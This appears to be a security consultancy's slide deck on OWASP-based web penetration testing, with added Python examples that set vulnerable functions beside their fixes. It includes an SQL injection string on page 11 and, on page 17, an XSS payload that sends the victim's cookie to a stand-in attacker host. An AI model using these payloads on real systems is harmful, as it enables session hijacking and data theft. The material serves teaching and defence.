Penetration Testing following OWASP

Page 1

Penetration Testing following OWASP

Boyan Yanchev – Chief Technology Officer
Peter Dimkov – IS Consultant

Page 2

About Lirex

Page 3

“Penetration testing”

A method of compromising the security of a computer system or network by simulating an attack by a malicious hacker.

Page 4

Pentest Requirements by Standards

PCI-DSS Requirement 11: Regularly test security systems and processes.

GDPR Article 32, 1 (d) - a process for regularly testing, assessing and evaluating the effectiveness of technical and organisational measures for ensuring the security of the processing.

ISO 27001
A.12.6 – Technical vulnerability management
A.9.4 – System and application access control
A.11.1.4 – Protecting against external and environmental threats
A.12.2 – Protection from malware
A.14.2.8 – System Security Testing
…

Page 5

Types of “Penetration tests” (by target scope)

Vulnerability assessment

Infrastructure Penetration tests: Internal, External

WEB/Application Penetration tests: Static WEB Site, Dynamic content and applications

Mobile application Penetration tests

Page 6

OSI Model

Open Systems Interconnection model (OSI model)

Page 7

Top 10 threats defined by OWASP for 2013

Open Web Application Security Project: List of the Top 10 most critical WEB Application Security Risks

The top 10 threats defined by OWASP for 2013 include:
A1: Injection (Injection flaws, such as SQL, OS, and LDAP injection)
A2: Broken Authentication and Session Management
A3: Cross-Site Scripting (XSS)
A4: Insecure Direct Object References
A5: Security Misconfiguration
A6: Sensitive Data Exposure
A7: Missing Function Level Access Control
A8: Cross-Site Request Forgery (CSRF)
A9: Using Components with Known Vulnerabilities
A10: Unvalidated Redirects and Forwards

Totally free to use for personal and business use

Page 8

OWASP Top 10 2017

OWASP Top 10 2017 RC1 – Rejected

OWASP Top 10 2017 RC2 – Released (20.10.2017)

New OWASP Top 10 2017 is to be released in late November 2017

Page 9

Top 10 threats defined by OWASP for 2013

Author: Alan Zeichick, Principal Analyst, Camden Associates

Page 10

A1. Injections

Injection attacks occur when unvalidated input is embedded in an instruction stream

Impact - SEVERE!

Data can be stolen, modified, deleted

Client-side controls can easily be bypassed by an attacker

Related to: SQL, LDAP, anything that builds up a query from a user input

Page 11

SQL Injection – Illustrated (source: OWASP)

[Diagram: an HTTP request carrying attacker-supplied form data passes through Firewall, Hardened OS, Web Server and App Server (Custom Code) to the back-end Databases, Legacy Systems, Web Services, Directories, Human Resources and Billing systems. The attack travels at the Application Layer, above the Network Layer, and reaches the Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce and Bus. Functions of the application. Labels: HTTP request, SQL query, DB Table, HTTP response; form fields "Account:" and "SKU:".]

"SELECT * FROM accounts WHERE acct='' OR 1=1--'"

1. Application presents a form to the attacker
2. Attacker sends an attack in the form data
3. Application forwards attack to the database in a SQL query
4. Database runs query containing attack and sends encrypted results back to application
5. Application decrypts data as normal and sends results to the user

Account Summary: Acct: 5424-6066-2134-4334, Acct: 4128-7574-3921-0192, Acct: 5424-9383-2039-4029, Acct: 4128-0004-1234-0293
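Steps 3 to 5 of the illustration, and the "anything that builds up a query from a user input" point on the A1 slide, are easiest to see by running the query both ways. This is an added example, not code from the slides or from Lirex; the table is constructed in memory from the account numbers shown in the "Account Summary" panel, and the form value is the one from the illustration.

```python
import sqlite3

# Constructed sample table using the account numbers shown on the slide's "Account Summary"
SAMPLE_ACCOUNTS = [
    ("5424-6066-2134-4334", "alice"),
    ("4128-7574-3921-0192", "bob"),
    ("5424-9383-2039-4029", "carol"),
    ("4128-0004-1234-0293", "dave"),
]


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (acct TEXT PRIMARY KEY, owner TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)", SAMPLE_ACCOUNTS)
    return conn


def lookup_vulnerable(conn, acct):
    # Step 3 of the diagram: the form value is pasted into the SQL text, so quotes
    # and SQL keywords in that value change what the query means.
    sql = "SELECT * FROM accounts WHERE acct='" + acct + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, acct):
    # Fix: the SQL text is constant and the value is bound as a parameter, so it is
    # compared as data and never parsed as SQL, whatever characters it contains.
    return conn.execute("SELECT * FROM accounts WHERE acct=?", (acct,)).fetchall()


def demo():
    conn = build_db()
    payload = "' OR 1=1--"   # the form value from the slide's illustration
    return {
        "vulnerable": len(lookup_vulnerable(conn, payload)),        # every account row leaks
        "parameterized": len(lookup_parameterized(conn, payload)),  # no row has that literal acct
        "normal": len(lookup_parameterized(conn, "5424-6066-2134-4334")),
    }


if __name__ == "__main__":
    print(demo())
```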

Page 12

Injection

Page 13

A1. Injections

Source: http://codecurmudgeon.com/wp/sql-injecton-hall-of-shame/

Page 14

A2. Broken Authentication and Session Management

Hijacking a user’s session

HTTP is a “stateless” protocol which means that credentials have to go with every request

SESSION ID used to track state.

Page 15

A2. Broken Authentication and Session Management

Vulnerabilities:
Session IDs are being stored in the URL
Guessable session IDs
Session IDs are not timing out
Passwords are not stored hashed
Credentials are sent over plain text
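The first four items on this slide map onto four concrete coding decisions. The following is an added example (not from the slides or from Lirex) of a minimal session store that addresses them: session IDs come from the OS CSPRNG, are carried in a cookie rather than the URL, expire after an idle timeout, and passwords are stored as salted PBKDF2 hashes. The 15-minute timeout and the in-memory store are assumptions made for the example.

```python
import hashlib
import hmac
import secrets
import time

SESSION_TTL_SECONDS = 15 * 60   # idle timeout; a value chosen for this example


class SessionStore:
    """In-memory session table, id -> (user, last_seen). Constructed for this example."""

    def __init__(self, now=time.time):
        self._now = now          # injectable clock so expiry can be tested
        self._sessions = {}

    def create(self, user):
        # 32 random bytes from the OS CSPRNG: not guessable, unlike counters or timestamps
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = (user, self._now())
        return sid

    def user_for(self, sid):
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        user, last_seen = entry
        if self._now() - last_seen > SESSION_TTL_SECONDS:
            del self._sessions[sid]      # an idle session expires instead of living forever
            return None
        self._sessions[sid] = (user, self._now())
        return user


def set_cookie_header(sid):
    # Carry the id in a cookie, never in the URL (URLs end up in logs, history and Referer)
    return f"Set-Cookie: session={sid}; HttpOnly; Secure; SameSite=Lax; Path=/"


def hash_password(password, salt=None):
    # Salted PBKDF2-HMAC-SHA256; the salt is stored in front of the digest
    salt = salt or secrets.token_bytes(16)
    return salt + hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


def verify_password(password, stored):
    salt, digest = stored[:16], stored[16:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return hmac.compare_digest(candidate, digest)   # constant-time comparison
```

The fifth item, credentials sent in plain text, is addressed by serving everything over TLS, which is why the cookie above carries the Secure flag.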

Page 16

A3. Cross-Site Scripting (XSS)

The most prevalent web application security flaw

Enables the attacker to execute scripts in victim’s browser

Used to: steal user’s session; steal sensitive data; rewrite web page (insert malicious content); redirect user to phishing or malware site

Be sure to sanitize your input fields!

Page 17

A3. Cross-Site Scripting (XSS)

<script>alert('XSS Attack!')</script>

<script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi ?foo='+document.cookie</script>
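What stops the payloads above from executing is how the application writes untrusted text back into the page. The example below is added here and is not from the slides or from Lirex: it renders the first payload unencoded and encoded for two HTML contexts, and adds the input-side allowlist check that the previous slide's "sanitize your input fields" advice refers to. The `<p>` and `<input>` templates and the username rule are assumptions for the example.

```python
import html
import re

# The first payload shown on the slide, used here as constructed test input
SLIDE_PAYLOAD = "<script>alert('XSS Attack!')</script>"
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def render_unsafe(comment):
    # The flaw: untrusted text is concatenated into the page as markup
    return '<p class="comment">' + comment + "</p>"


def render_safe(comment):
    # Output encoding for HTML body context: < > & " ' become entities,
    # so the browser displays the text instead of executing it
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"


def render_attr_safe(value):
    # Attribute context: always quote the attribute and escape both quote
    # characters inside it, so the value cannot close the attribute early
    return '<input name="q" value="' + html.escape(value, quote=True) + '">'


USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def validate_username(value):
    # Input-side control: an allowlist of the characters a username may contain;
    # anything else is rejected rather than "cleaned", which is hard to get right
    return USERNAME_RE.fullmatch(value) is not None


def contains_script_tag(markup):
    # Helper for checks: does a real <script> tag survive rendering?
    return SCRIPT_TAG.search(markup) is not None
```

Output encoding is the control that applies to every field; the allowlist is a second layer that only fits fields with a known shape.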

Page 18

A4. Insecure Direct Object References

Accessing data or system by changing a parameter value which refers to an object that the user is not authorized to access

Page 19

A7. Missing Function Level Access Control

Threat: unauthorized access to functionality (privilege escalation)

Authorization checks are used in order to generate appropriate menus and/or show/hide various options

If an attacker is aware of the presence of these other functions he could attempt to call them

If the server does not check the permissions for this user, the privilege escalation is successful
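A4 (changing an object id in a parameter) and A7 (calling a function the menu did not show) are both fixed by the same server-side decision: may this role call this function, and does this object belong to this caller? The block below is an added example, not code from the slides or from Lirex; the invoice table, the roles and the function-to-role map are constructed for it.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    role: str            # "user" or "admin" in this example


# Constructed sample data: invoice id -> owning user id
INVOICES = {101: 1, 102: 2}

# A7: which roles may call which server-side function. Enforced on the server,
# never inferred from which menu entries the client happened to render.
FUNCTION_ROLES = {
    "view_invoice": {"user", "admin"},
    "delete_user": {"admin"},
}


class Forbidden(Exception):
    pass


def authorize(user, function_name, owner_id=None):
    """Server-side decision: the role may call the function AND, for object access,
    the caller owns the object (admins may see every object)."""
    if user.role not in FUNCTION_ROLES.get(function_name, ()):
        return False
    if owner_id is not None and owner_id != user.id and user.role != "admin":
        return False
    return True


def view_invoice_insecure(user, invoice_id):
    # A4 flaw: the id from the request is trusted, so changing 101 to 102 in the
    # parameter returns another user's invoice
    return INVOICES[invoice_id]


def view_invoice(user, invoice_id):
    owner = INVOICES.get(invoice_id)
    # A missing invoice and a foreign invoice get the same response, so the error
    # type does not reveal which ids exist
    if owner is None or not authorize(user, "view_invoice", owner):
        raise Forbidden("no such invoice")
    return owner


def delete_user(user, target_id):
    if not authorize(user, "delete_user"):   # a hidden menu entry is not a control
        raise Forbidden("not allowed")
    return f"deleted {target_id}"
```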

Page 20

A5. Security Misconfiguration

Attack vectors: Missing (outdated) patches; Misconfigurations; Use of default accounts; Use of unnecessary services and features; Unprotected files and directories; Error messages not customized or blocked

Page 21

A5. Security Misconfiguration

Page 22

A6. Sensitive Data Exposure

When high value data (passwords, credit card data, e-mails, etc.) is not properly handled by the application and not adequately protected on the WEB Site

Data Exposure is at serious risk!

Evaluate the high value data; use encryption

Page 23

A8. Cross-Site Request Forgery (CSRF)

An attacker can cause the victim to change their password, username or email, send private messages from the victim’s account, steal money, or order stuff with a click of a link

Most frameworks have a mechanism to protect from CSRF
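The mechanism those frameworks provide is a synchronizer token: a per-session secret that a cross-site page cannot read and therefore cannot include in the forged form. The block below is an added example of that check, not code from the slides, from Lirex or from any particular framework; the server key, the session ids and the form dictionaries are constructed for it.

```python
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)   # per-deployment key, generated here for the example
SAFE_METHODS = ("GET", "HEAD", "OPTIONS")


def issue_csrf_token(session_id):
    # Token bound to the session: HMAC(server key, session id). It is embedded in the
    # application's own forms; a page on another origin cannot read it.
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_request(method, session_id, form):
    """Return True if a request with this method, session and parsed body may be processed."""
    if method.upper() in SAFE_METHODS:
        return True            # safe methods must not change state, so no token is needed
    submitted = form.get("csrf_token")
    if not session_id or not submitted:
        return False           # a forged cross-site form arrives without the token
    expected = issue_csrf_token(session_id)
    return hmac.compare_digest(submitted, expected)   # constant-time comparison


def change_password(method, session_id, form, accounts):
    """Example state-changing handler: `accounts` maps session id -> password (constructed)."""
    if not verify_request(method, session_id, form):
        return 403
    accounts[session_id] = form["new_password"]
    return 200
```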

Page 24

A9. Using Components with Known Vulnerabilities

Using things like framework libraries, plugins and such

Components often run with the full privilege of the application

Finding exploits for a particular component (if components are not updated)

Exploit the vulnerability

Prevention: Write your own components; Always update with the most current version

Page 25

A10. Unvalidated Redirects and Forwards

The possibility that a WEB application accepts untrusted input that causes the WEB application to redirect to the request URL contained within that untrusted input

Launching phishing scams; Stealing credentials
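The defence is to treat the redirect parameter as a path on the application's own origin rather than as a URL. The block below is an added example, not from the slides or from Lirex: it resolves the parameter against the current host, rejects anything that lands elsewhere (including the scheme-less `//host` and backslash forms browsers accept), and re-emits only path and query. The host name and allowlist are assumptions for the example.

```python
from urllib.parse import urljoin, urlsplit

# Hosts this application may send users to (constructed allowlist for the example)
ALLOWED_HOSTS = {"app.example.com"}
DEFAULT_TARGET = "/"


def safe_redirect_target(next_url, request_host="app.example.com"):
    """Return a same-origin path for the Location header, or the default landing page."""
    if not next_url:
        return DEFAULT_TARGET
    # Browsers treat a backslash like a slash in scheme-less URLs, so "/\host" is
    # really "//host"; normalise before parsing so it is not mistaken for a path
    candidate = next_url.replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return DEFAULT_TARGET            # javascript:, data: and similar schemes
    # Resolve against the current origin: "//other.host" becomes https://other.host
    resolved = urlsplit(urljoin(f"https://{request_host}/", candidate))
    if resolved.hostname not in ALLOWED_HOSTS:
        return DEFAULT_TARGET
    # Re-emit only path and query, so the Location header can never carry a foreign origin
    path = resolved.path or "/"
    return path + ("?" + resolved.query if resolved.query else "")


def login_redirect_location(query_params):
    # Typical use: the `next` parameter of a login form, validated before redirecting
    return safe_redirect_target(query_params.get("next", ""))
```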

Page 26

Tools

Vulnerability Assessment tools: OpenVAS, Acunetix, Qualys, Nessus

Metasploit Framework, The Pentesters Framework (PTF), Kali Linux

Nmap, AirCrack, SQLMap, Ettercap

Wireshark, Nikto/Wikto, SiteDigger

Proxies: Paros Proxy, OWASP ZAP, Burp Suite

Various Browser Plugins

Page 27

Thank you!